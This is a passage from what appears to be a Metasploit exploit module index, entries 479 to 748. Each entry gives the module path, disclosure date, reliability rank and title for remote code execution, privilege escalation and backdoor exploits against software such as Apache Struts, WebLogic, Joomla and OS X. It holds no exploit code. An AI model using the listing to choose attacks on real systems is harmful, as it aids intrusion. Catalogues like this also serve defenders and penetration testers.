Deserialization Code Execution + 479 multi/http/rails_secret_deserialization 2013-04-11 excellent No Ruby on Rails Known Secret Session Cookie Remote Code Execution + 480 multi/http/rails_web_console_v2_code_exec 2015-06-16 excellent No Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution + 481 multi/http/rails_xml_yaml_code_exec 2013-01-07 excellent No Ruby on Rails XML Processor YAML Deserialization Code Execution + 482 multi/http/rocket_servergraph_file_requestor_rce 2013-10-30 great Yes Rocket Servergraph Admin Center fileRequestor Remote Code Execution + 483 multi/http/sflog_upload_exec 2012-07-06 excellent Yes Sflog! CMS 1.0 Arbitrary File Upload Vulnerability + 484 multi/http/simple_backdoors_exec 2015-09-08 excellent Yes Simple Backdoor Shell Remote Code Execution + 485 multi/http/sit_file_upload 2011-11-10 excellent Yes Support Incident Tracker Remote Command Execution + 486 multi/http/snortreport_exec 2011-09-19 excellent No Snortreport nmap.php/nbtscan.php Remote Command Execution + 487 multi/http/solarwinds_store_manager_auth_filter 2014-08-19 excellent Yes SolarWinds Storage Manager Authentication Bypass + 488 multi/http/sonicwall_gms_upload 2012-01-17 excellent Yes SonicWALL GMS 6 Arbitrary File Upload + 489 multi/http/sonicwall_scrutinizer_methoddetail_sqli 2014-07-24 excellent Yes Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection + 490 multi/http/splunk_mappy_exec 2011-12-12 excellent Yes Splunk Search Remote Code Execution + 491 multi/http/splunk_upload_app_exec 2012-09-27 good Yes Splunk Custom App Remote Code Execution + 492 multi/http/spree_search_exec 2011-10-05 excellent No Spreecommerce 0.60.1 Arbitrary Command Execution + 493 multi/http/spree_searchlogic_exec 2011-04-19 excellent No Spreecommerce Arbitrary Command Execution + 494 multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution + 495 multi/http/struts2_content_type_ognl 2017-03-07 excellent Yes Apache Struts Jakarta Multipart Parser OGNL Injection + 496 multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection + 497 multi/http/struts2_rest_xstream 2017-09-05 excellent Yes Apache Struts 2 REST Plugin XStream RCE + 498 multi/http/struts_code_exec 2010-07-13 good No Apache Struts Remote Command Execution + 499 multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution + 500 multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent No Apache Struts Remote Command Execution + 501 multi/http/struts_code_exec_parameters 2011-10-01 excellent Yes Apache Struts ParametersInterceptor Remote Code Execution + 502 multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution + 503 multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution + 504 multi/http/struts_dmi_exec 2016-04-27 excellent Yes Apache Struts Dynamic Method Invocation Remote Code Execution + 505 multi/http/struts_dmi_rest_exec 2016-06-01 excellent Yes Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution + 506 multi/http/struts_include_params 2013-05-24 great Yes Apache Struts includeParams Remote Code Execution + 507 multi/http/stunshell_eval 2013-03-23 great Yes STUNSHELL Web Shell Remote PHP Code Execution + 508 multi/http/stunshell_exec 2013-03-23 great Yes STUNSHELL Web Shell Remote Code Execution + 509 multi/http/sun_jsws_dav_options 2010-01-20 great Yes Sun Java System Web Server WebDAV OPTIONS Buffer Overflow + 510 multi/http/sysaid_auth_file_upload 2015-06-03 excellent Yes SysAid Help Desk Administrator Portal Arbitrary File Upload + 511 multi/http/sysaid_rdslogs_file_upload 2015-06-03 excellent Yes SysAid Help Desk 'rdslogs' Arbitrary File Upload + 512 multi/http/testlink_upload_exec 2012-08-13 excellent Yes TestLink v1.9.3 Arbitrary File Upload Vulnerability + 513 multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass + 514 multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution + 515 multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution + 516 multi/http/traq_plugin_exec 2011-12-12 excellent Yes Traq admincp/common.php Remote Code Execution + 517 multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi 2017-04-10 excellent Yes Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution + 518 multi/http/uptime_file_upload_1 2013-11-19 excellent Yes Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload + 519 multi/http/uptime_file_upload_2 2013-11-18 excellent Yes Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload + 520 multi/http/v0pcr3w_exec 2013-03-23 great Yes v0pCr3w Web Shell Remote Code Execution + 521 multi/http/vbseo_proc_deutf 2012-01-23 excellent Yes vBSEO proc_deutf() Remote PHP Code Injection + 522 multi/http/vbulletin_unserialize 2015-11-04 excellent Yes vBulletin 5.1.2 Unserialize Code Execution + 523 multi/http/visual_mining_netcharts_upload 2014-11-03 excellent Yes Visual Mining NetCharts Server Remote Code Execution + 524 multi/http/vtiger_install_rce 2014-03-05 manual No Vtiger Install Unauthenticated Remote Command Execution + 525 multi/http/vtiger_logo_upload_exec 2015-09-28 excellent Yes Vtiger CRM - Authenticated Logo Upload RCE + 526 multi/http/vtiger_php_exec 2013-10-30 excellent Yes vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution + 527 multi/http/vtiger_soap_upload 2013-03-26 excellent Yes vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload + 528 multi/http/webnms_file_upload 2016-07-04 excellent Yes WebNMS Framework Server Arbitrary File Upload + 529 multi/http/webpagetest_upload_exec 2012-07-13 excellent Yes WebPageTest Arbitrary PHP File Upload + 530 multi/http/werkzeug_debug_rce 2015-06-28 excellent Yes Werkzeug Debug Shell Command Execution + 531 multi/http/wikka_spam_exec 2011-11-30 excellent Yes WikkaWiki 1.3.2 Spam Logging PHP Injection + 532 multi/http/wp_crop_rce 2019-02-19 excellent Yes WordPress Crop-image Shell Upload + 533 multi/http/wp_ninja_forms_unauthenticated_file_upload 2016-05-04 excellent Yes WordPress Ninja Forms Unauthenticated File Upload + 534 multi/http/wp_responsive_thumbnail_slider_upload 2015-08-28 excellent Yes WordPress Responsive Thumbnail Slider Arbitrary File Upload + 535 multi/http/x7chat2_php_exec 2014-10-27 excellent Yes X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution + 536 multi/http/zabbix_script_exec 2013-10-30 excellent Yes Zabbix Authenticated Remote Command Execution + 537 multi/http/zemra_panel_rce 2012-06-28 excellent Yes Zemra Botnet CnC Web Panel Remote Code Execution + 538 multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Yes Novell ZENworks Configuration Management Arbitrary File Upload + 539 multi/http/zenworks_control_center_upload 2013-03-22 great Yes Novell ZENworks Configuration Management Remote Execution + 540 multi/http/zpanel_information_disclosure_rce 2014-01-30 excellent No Zpanel Remote Unauthenticated RCE + 541 multi/ids/snort_dce_rpc 2007-02-19 good No Snort 2 DCE/RPC Preprocessor Buffer Overflow + 542 multi/local/allwinner_backdoor 2016-04-30 excellent Yes Allwinner 3.4 Legacy Kernel Local Privilege Escalation + 543 multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc 2016-09-23 excellent Yes MagniComp SysInfo mcsiwrapper Privilege Escalation + 544 multi/local/xorg_x11_suid_server 2018-10-25 good Yes Xorg X11 Server SUID logfile Privilege Escalation + 545 multi/misc/arkeia_agent_exec 2015-07-10 great Yes Western Digital Arkeia Remote Code Execution + 546 multi/misc/batik_svg_java 2012-05-11 excellent No Squiggle 1.7 SVG Browser Java Code Execution + 547 multi/misc/bmc_patrol_cmd_exec 2019-01-17 excellent No BMC Patrol Agent Privilege Escalation Cmd Execution + 548 multi/misc/bmc_server_automation_rscd_nsh_rce 2016-03-16 excellent Yes BMC Server Automation RSCD Agent NSH Remote Command Execution + 549 multi/misc/claymore_dual_miner_remote_manager_rce 2018-02-09 excellent Yes Nanopool Claymore Dual Miner APIs RCE + 550 multi/misc/consul_rexec_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Rexec + 551 multi/misc/consul_service_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Services API + 552 multi/misc/erlang_cookie_rce 2009-11-20 great No Erlang Port Mapper Daemon Cookie RCE + 553 multi/misc/hp_data_protector_exec_integutil 2014-10-02 great Yes HP Data Protector EXEC_INTEGUTIL Remote Code Execution + 554 multi/misc/hp_vsa_exec 2011-11-11 excellent No HP StorageWorks P4000 Virtual SAN Appliance Command Execution + 555 multi/misc/indesign_server_soap 2012-11-11 excellent Yes Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution + 556 multi/misc/java_jdwp_debugger 2010-03-12 good Yes Java Debug Wire Protocol Remote Code Execution + 557 multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution + 558 multi/misc/java_rmi_server 2011-10-15 excellent No Java RMI Server Insecure Default Configuration Java Code Execution + 559 multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution + 560 multi/misc/msf_rpc_console 2011-05-22 excellent No Metasploit RPC Console Command Execution + 561 multi/misc/msfd_rce_remote 2018-04-11 excellent Yes Metasploit msfd Remote Code Execution + 562 multi/misc/nodejs_v8_debugger 2016-08-15 excellent Yes NodeJS Debugger Command Injection + 563 multi/misc/openoffice_document_macro 2017-02-08 excellent No Apache OpenOffice Text Document Malicious Macro Execution + 564 multi/misc/openview_omniback_exec 2001-02-28 excellent Yes HP OpenView OmniBack II Command Execution + 565 multi/misc/osgi_console_exec 2018-02-13 normal Yes Eclipse Equinoxe OSGi Console Command Execution + 566 multi/misc/pbot_exec 2009-11-02 excellent Yes PHP IRC Bot pbot eval() Remote Code Execution + 567 multi/misc/persistent_hpca_radexec_exec 2014-01-02 great Yes HP Client Automation Command Injection + 568 multi/misc/ra1nx_pubcall_exec 2013-03-24 great Yes Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution + 569 multi/misc/teamcity_agent_xmlrpc_exec 2015-04-14 excellent Yes TeamCity Agent XML-RPC Command Execution + 570 multi/misc/veritas_netbackup_cmdexec 2004-10-21 excellent Yes VERITAS NetBackup Remote Command Execution + 571 multi/misc/w3tw0rk_exec 2015-06-04 excellent Yes w3tw0rk / Pitbul IRC Bot Remote Code Execution + 572 multi/misc/weblogic_deserialize 2018-04-17 manual Yes Oracle Weblogic Server Deserialization RCE + 573 multi/misc/weblogic_deserialize_asyncresponseservice 2019-04-23 excellent Yes Oracle Weblogic Server Deserialization RCE - AsyncResponseService + 574 multi/misc/weblogic_deserialize_marshalledobject 2016-07-19 manual No Oracle Weblogic Server Deserialization RCE - MarshalledObject + 575 multi/misc/weblogic_deserialize_rawobject 2015-01-28 excellent No Oracle Weblogic Server Deserialization RCE - Raw Object + 576 multi/misc/weblogic_deserialize_unicastref 2017-01-25 excellent No Oracle Weblogic Server Deserialization RCE - RMI UnicastRef + 577 multi/misc/wireshark_lwres_getaddrbyname 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow + 578 multi/misc/wireshark_lwres_getaddrbyname_loop 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop) + 579 multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution + 580 multi/misc/zend_java_bridge 2011-03-28 great No Zend Server Java Bridge Arbitrary Java Code Execution + 581 multi/mysql/mysql_udf_payload 2009-01-16 excellent No Oracle MySQL UDF Payload Execution + 582 multi/ntp/ntp_overflow 2001-04-04 good No NTP Daemon readvar Buffer Overflow + 583 multi/php/php_unserialize_zval_cookie 2007-03-04 average Yes PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie) + 584 multi/php/wp_duplicator_code_inject 2018-08-29 manual Yes Snap Creek Duplicator WordPress plugin code injection + 585 multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution + 586 multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution + 587 multi/realserver/describe 2002-12-20 great Yes RealServer Describe Buffer Overflow + 588 multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow + 589 multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution + 590 multi/sap/sap_mgmt_con_osexec_payload 2011-03-08 excellent Yes SAP Management Console OSExecute Payload Execution + 591 multi/sap/sap_soap_rfc_sxpg_call_system_exec 2013-03-26 great Yes SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution + 592 multi/sap/sap_soap_rfc_sxpg_command_exec 2012-05-08 great Yes SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution + 593 multi/script/web_delivery 2013-07-19 manual No Script Web Delivery + 594 multi/ssh/sshexec 1999-01-01 manual No SSH User Code Execution + 595 multi/svn/svnserve_date 2004-05-19 average No Subversion Date Svnserve + 596 multi/upnp/libupnp_ssdp_overflow 2013-01-29 normal No Portable UPnP SDK unique_service_name() Remote Code Execution + 597 multi/vnc/vnc_keyboard_exec 2015-07-10 great No VNC Keyboard Remote Code Execution + 598 multi/vpn/tincd_bof 2013-04-22 average No Tincd Post-Authentication Remote TCP Stack Buffer Overflow + 599 multi/wyse/hagent_untrusted_hsdata 2009-07-10 excellent No Wyse Rapport Hagent Fake Hserver Command Execution + 600 netware/smb/lsass_cifs 2007-01-21 average No Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow + 601 netware/sunrpc/pkernel_callit 2009-09-30 good No NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow + 602 osx/afp/loginext 2004-05-03 average No AppleFileServer LoginExt PathName Overflow + 603 osx/arkeia/type77 2005-02-18 average Yes Arkeia Backup Client Type 77 Overflow (Mac OS X) + 604 osx/browser/adobe_flash_delete_range_tl_op 2016-04-27 great No Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion + 605 osx/browser/mozilla_mchannel 2011-05-10 normal No Mozilla Firefox 3.6.16 mChannel Use-After-Free + 606 osx/browser/safari_file_policy 2011-10-12 normal No Apple Safari file:// Arbitrary Code Execution + 607 osx/browser/safari_metadata_archive 2006-02-21 excellent No Safari Archive Metadata Command Execution + 608 osx/browser/safari_proxy_object_type_confusion 2018-03-15 manual No Safari Proxy Object Type Confusion + 609 osx/browser/safari_user_assisted_applescript_exec 2015-10-16 manual No Safari User-Assisted Applescript Exec Attack + 610 osx/browser/safari_user_assisted_download_launch 2014-03-10 manual No Safari User-Assisted Download and Run Attack + 611 osx/browser/software_update 2007-12-17 excellent No Apple OS X Software Update Command Execution + 612 osx/email/mailapp_image_exec 2006-03-01 manual No Mail.app Image Attachment Command Execution + 613 osx/ftp/webstar_ftp_user 2004-07-13 average No WebSTAR FTP Server USER Overflow + 614 osx/http/evocam_webserver 2010-06-01 average No MacOS X EvoCam HTTP GET Buffer Overflow + 615 osx/local/dyld_print_to_file_root 2015-07-21 great Yes Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation + 616 osx/local/iokit_keyboard_root 2014-09-24 manual Yes Mac OS X IOKit Keyboard Driver Root Privilege Escalation + 617 osx/local/libxpc_mitm_ssudo 2018-03-15 excellent Yes Mac OS X libxpc MITM Privilege Escalation + 618 osx/local/nfs_mount_root 2014-04-11 normal Yes Mac OS X NFS Mount Privilege Escalation Exploit + 619 osx/local/persistence 2012-04-01 excellent No Mac OS X Persistent Payload Installer + 620 osx/local/root_no_password 2017-11-29 excellent No Mac OS X Root Privilege Escalation + 621 osx/local/rootpipe 2015-04-09 great Yes Apple OS X Rootpipe Privilege Escalation + 622 osx/local/rootpipe_entitlements 2015-07-01 great Yes Apple OS X Entitlements Rootpipe Privilege Escalation + 623 osx/local/rsh_libmalloc 2015-10-01 normal No Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation + 624 osx/local/setuid_tunnelblick 2012-08-11 excellent Yes Setuid Tunnelblick Privilege Escalation + 625 osx/local/setuid_viscosity 2012-08-12 excellent Yes Viscosity setuid-set ViscosityHelper Privilege Escalation + 626 osx/local/sudo_password_bypass 2013-02-28 normal Yes Mac OS X Sudo Password Bypass + 627 osx/local/tpwn 2015-08-16 normal Yes Mac OS X "tpwn" Privilege Escalation + 628 osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock) + 629 osx/mdns/upnp_location 2007-05-25 average Yes Mac OS X mDNSResponder UPnP Location Overflow + 630 osx/misc/ufo_ai 2009-10-28 average No UFO: Alien Invasion IRC Client Buffer Overflow + 631 osx/rtsp/quicktime_rtsp_content_type 2007-11-23 average No MacOS X QuickTime RTSP Content-Type Overflow + 632 osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow + 633 osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) + 634 qnx/local/ifwatchd_priv_esc 2014-03-10 excellent Yes ifwatchd Privilege Escalation + 635 qnx/qconn/qconn_exec 2012-09-04 excellent Yes QNX qconn Command Execution + 636 solaris/dtspcd/heap_noir 2002-07-10 great Yes Solaris dtspcd Heap Overflow + 637 solaris/local/extremeparr_dtappgather_priv_esc 2017-04-24 excellent Yes Solaris 'EXTREMEPARR' dtappgather Privilege Escalation + 638 solaris/local/libnspr_nspr_log_file_priv_esc 2006-10-11 excellent Yes Solaris libnspr NSPR_LOG_FILE Privilege Escalation + 639 solaris/local/rsh_stack_clash_priv_esc 2017-06-19 good Yes Solaris RSH Stack Clash Privilege Escalation + 640 solaris/lpd/sendmail_exec 2001-08-31 excellent No Solaris LPD Command Execution + 641 solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow + 642 solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC) + 643 solaris/sunrpc/sadmind_adm_build_path 2008-10-14 great No Sun Solaris sadmind adm_build_path() Buffer Overflow + 644 solaris/sunrpc/sadmind_exec 2003-09-13 excellent No Solaris sadmind Command Execution + 645 solaris/sunrpc/ypupdated_exec 1994-12-12 excellent No Solaris ypupdated Command Execution + 646 solaris/telnet/fuser 2007-02-12 excellent No Sun Solaris Telnet Remote Authentication Bypass Vulnerability + 647 solaris/telnet/ttyprompt 2002-01-18 excellent No Solaris in.telnetd TTYPROMPT Buffer Overflow + 648 unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock) + 649 unix/dhcp/rhel_dhcp_client_command_injection 2018-05-15 excellent No DHCP Client Command Injection (DynoRoot) + 650 unix/fileformat/ghostscript_type_confusion 2017-04-27 excellent No Ghostscript Type Confusion Arbitrary Command Execution + 651 unix/fileformat/imagemagick_delegate 2016-05-03 excellent No ImageMagick Delegate Arbitrary Command Execution + 652 unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution + 653 unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution + 654 unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution + 655 unix/http/contentkeeperweb_mimencode 2009-02-25 excellent Yes ContentKeeper Web Remote Command Execution + 656 unix/http/ctek_skyrouter 2011-09-08 average No CTEK SkyRouter 4200 and 4300 Command Execution + 657 unix/http/dell_kace_k1000_upload 2014-03-07 excellent Yes Dell KACE K1000 File Upload + 658 unix/http/epmp1000_get_chart_cmd_shell 2017-12-18 excellent Yes Cambium ePMP1000 'get_chart' Shell via Command Injection (v3.1-3.5-RC7) + 659 unix/http/epmp1000_ping_cmd_shell 2015-11-28 excellent Yes Cambium ePMP1000 'ping' Shell via Command Injection (up to v2.5) + 660 unix/http/freepbx_callmenum 2012-03-20 manual No FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution + 661 unix/http/lifesize_room 2011-07-13 excellent No LifeSize Room Command Injection + 662 unix/http/pfsense_clickjacking 2017-11-21 normal No Clickjacking Vulnerability In CSRF Error Page pfSense + 663 unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE + 664 unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE + 665 unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection + 666 unix/http/tnftp_savefile 2014-10-28 excellent No tnftp "savefile" Arbitrary Command Execution + 667 unix/http/twiki_debug_plugins 2014-10-09 excellent Yes TWiki Debugenableplugins Remote Code Execution + 668 unix/http/vmturbo_vmtadmin_exec_noauth 2014-06-25 excellent Yes VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution + 669 unix/http/xdebug_unauth_exec 2017-09-17 excellent Yes xdebug Unauthenticated OS Command Execution + 670 unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution + 671 unix/local/at_persistence 1997-01-01 excellent Yes at(1) Persistence + 672 unix/local/chkrootkit 2014-06-04 manual Yes Chkrootkit Local Privilege Escalation + 673 unix/local/emacs_movemail 1986-08-01 excellent Yes Emacs movemail Privilege Escalation + 674 unix/local/exim_perl_startup 2016-03-10 excellent Yes Exim "perl_startup" Privilege Escalation + 675 unix/local/netbsd_mail_local 2016-07-07 excellent No NetBSD mail.local Privilege Escalation + 676 unix/local/setuid_nmap 2012-07-19 excellent Yes Setuid Nmap Exploit + 677 unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution + 678 unix/misc/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass + 679 unix/misc/polycom_hdx_traceroute_exec 2017-11-12 excellent Yes Polycom Shell HDX Series Traceroute Command Execution + 680 unix/misc/qnx_qconn_exec 2012-09-04 excellent Yes QNX qconn Command Execution + 681 unix/misc/spamassassin_exec 2006-06-06 excellent No SpamAssassin spamd Remote Command Execution + 682 unix/misc/xerox_mfp 2012-03-07 good No Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability + 683 unix/misc/zabbix_agent_exec 2009-09-10 excellent No Zabbix Agent net.tcp.listen Command Injection + 684 unix/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass + 685 unix/smtp/clamav_milter_blackhole 2007-08-24 excellent No ClamAV Milter Blackhole-Mode Remote Code Execution + 686 unix/smtp/exim4_string_format 2010-12-07 excellent No Exim4 string_format Function Heap Buffer Overflow + 687 unix/smtp/morris_sendmail_debug 1988-11-02 average Yes Morris Worm sendmail Debug Mode Shell Escape + 688 unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock) + 689 unix/sonicwall/sonicwall_xmlrpc_rce 2016-07-22 excellent Yes SonicWall Global Management System XMLRPC set_time_zone Unauth RCE + 690 unix/ssh/array_vxag_vapv_privkey_privesc 2014-02-03 excellent No Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution + 691 unix/ssh/tectia_passwd_changereq 2012-12-01 excellent Yes Tectia SSH USERAUTH Change Request Password Reset Vulnerability + 692 unix/webapp/actualanalyzer_ant_cookie_exec 2014-08-28 excellent Yes ActualAnalyzer 'ant' Cookie Command Execution + 693 unix/webapp/arkeia_upload_exec 2013-09-16 excellent Yes Western Digital Arkeia Remote Code Execution + 694 unix/webapp/awstats_configdir_exec 2005-01-15 excellent Yes AWStats configdir Remote Command Execution + 695 unix/webapp/awstats_migrate_exec 2006-05-04 excellent Yes AWStats migrate Remote Command Execution + 696 unix/webapp/awstatstotals_multisort 2008-08-26 excellent Yes AWStats Totals multisort Remote Command Execution + 697 unix/webapp/barracuda_img_exec 2005-09-01 excellent Yes Barracuda IMG.PL Remote Command Execution + 698 unix/webapp/base_qry_common 2008-06-14 excellent No BASE base_qry_common Remote File Include + 699 unix/webapp/basilic_diff_exec 2012-06-28 excellent Yes Basilic 1.5.14 diff.php Arbitrary Command Execution + 700 unix/webapp/cacti_graphimage_exec 2005-01-15 excellent No Cacti graph_view.php Remote Command Execution + 701 unix/webapp/cakephp_cache_corruption 2010-11-15 excellent No CakePHP Cache Corruption Code Execution + 702 unix/webapp/carberp_backdoor_exec 2013-06-28 great Yes Carberp Web Panel C2 Backdoor Remote PHP Code Execution + 703 unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution + 704 unix/webapp/clipbucket_upload_exec 2013-10-04 excellent Yes ClipBucket Remote Code Execution + 705 unix/webapp/coppermine_piceditor 2008-01-30 excellent Yes Coppermine Photo Gallery picEditor.php Command Execution + 706 unix/webapp/datalife_preview_exec 2013-01-28 excellent Yes DataLife Engine preview.php PHP Code Injection + 707 unix/webapp/dogfood_spell_exec 2009-03-03 excellent Yes Dogfood CRM spell.php Remote Command Execution + 708 unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution + 709 unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection + 710 unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution + 711 unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE + 712 unix/webapp/egallery_upload_exec 2012-07-08 excellent Yes EGallery PHP File Upload Vulnerability + 713 unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection + 714 unix/webapp/flashchat_upload_exec 2013-10-04 excellent Yes FlashChat Arbitrary File Upload + 715 unix/webapp/foswiki_maketext 2012-12-03 excellent Yes Foswiki MAKETEXT Remote Command Execution + 716 unix/webapp/freepbx_config_exec 2014-03-21 excellent Yes FreePBX config.php Remote Code Execution + 717 unix/webapp/generic_exec 1993-11-14 excellent No Generic Web Application Unix Command Execution + 718 unix/webapp/get_simple_cms_upload_exec 2014-01-04 excellent Yes GetSimpleCMS PHP File Upload Vulnerability + 719 unix/webapp/google_proxystylesheet_exec 2005-08-16 excellent Yes Google Appliance ProxyStyleSheet Command Execution + 720 unix/webapp/graphite_pickle_exec 2013-08-20 excellent Yes Graphite Web Unsafe Pickle Handling + 721 unix/webapp/guestbook_ssi_exec 1999-11-05 excellent No Matt Wright guestbook.pl Arbitrary Command Execution + 722 unix/webapp/hastymail_exec 2011-11-22 excellent Yes Hastymail 2.1.1 RC1 Command Injection + 723 unix/webapp/havalite_upload_exec 2013-06-17 excellent Yes Havalite CMS Arbitary File Upload Vulnerability + 724 unix/webapp/horde_unserialize_exec 2013-06-27 excellent Yes Horde Framework Unserialize PHP Code Execution + 725 unix/webapp/hybridauth_install_php_exec 2014-08-04 manual Yes HybridAuth install.php PHP Code Execution + 726 unix/webapp/instantcms_exec 2013-06-26 excellent Yes InstantCMS 1.6 Remote PHP Code Execution + 727 unix/webapp/invision_pboard_unserialize_exec 2012-10-25 excellent Yes Invision IP.Board unserialize() PHP Code Execution + 728 unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution + 729 unix/webapp/joomla_comfields_sqli_rce 2017-05-17 excellent Yes Joomla Component Fields SQLi Remote Code Execution + 730 unix/webapp/joomla_comjce_imgmanager 2012-08-02 excellent Yes Joomla Component JCE File Upload Remote Code Execution + 731 unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution + 732 unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability + 733 unix/webapp/joomla_tinybrowser 2009-07-22 excellent Yes Joomla 1.5.12 TinyBrowser File Upload Code Execution + 734 unix/webapp/jquery_file_upload 2018-10-09 excellent Yes blueimp's jQuery (Arbitrary) File Upload + 735 unix/webapp/kimai_sqli 2013-05-21 average Yes Kimai v0.9.2 'db_restore.php' SQL Injection + 736 unix/webapp/libretto_upload_exec 2013-06-14 excellent Yes LibrettoCMS File Manager Arbitary File Upload Vulnerability + 737 unix/webapp/maarch_letterbox_file_upload 2015-02-11 excellent Yes Maarch LetterBox Unrestricted File Upload + 738 unix/webapp/mambo_cache_lite 2008-06-14 excellent No Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include + 739 unix/webapp/mitel_awc_exec 2010-12-12 excellent No Mitel Audio and Web Conferencing Command Injection + 740 unix/webapp/moinmoin_twikidraw 2012-12-30 manual Yes MoinMoin twikidraw Action Traversal File Upload + 741 unix/webapp/mybb_backdoor 2011-10-06 excellent Yes myBB 1.6.4 Backdoor Arbitrary Command Execution + 742 unix/webapp/nagios3_history_cgi 2012-12-09 great Yes Nagios3 history.cgi Host Command Execution + 743 unix/webapp/nagios3_statuswml_ping 2009-06-22 excellent No Nagios3 statuswml.cgi Ping Command Execution + 744 unix/webapp/nagios_graph_explorer 2012-11-30 excellent Yes Nagios XI Network Monitor Graph Explorer Component Command Injection + 745 unix/webapp/narcissus_backend_exec 2012-11-14 excellent Yes Narcissus Image Configuration Passthru Vulnerability + 746 unix/webapp/open_flash_chart_upload_exec 2009-12-14 great Yes Open Flash Chart v2 Arbitrary File Upload + 747 unix/webapp/openemr_sqli_privesc_upload 2013-09-16 excellent Yes OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution + 748 unix/webapp/openemr_upload_exec 2013-02-13 excellent Yes OpenEMR PHP File 